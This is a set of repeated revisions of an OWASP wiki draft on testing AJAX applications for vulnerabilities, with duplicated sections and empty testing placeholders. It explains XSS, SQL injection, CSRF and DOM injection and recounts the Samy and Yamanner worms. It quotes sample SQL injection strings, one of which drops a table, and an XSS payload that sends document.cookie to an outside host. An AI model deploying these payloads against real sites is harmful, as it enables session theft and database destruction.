This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-06T18:50:30Z

Anushshetty: /* Black Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==

'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-06T18:44:50Z

Anushshetty: /* Black Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==

'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-06T18:27:24Z

Anushshetty: /* Black Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==

'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd.
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:56:43Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
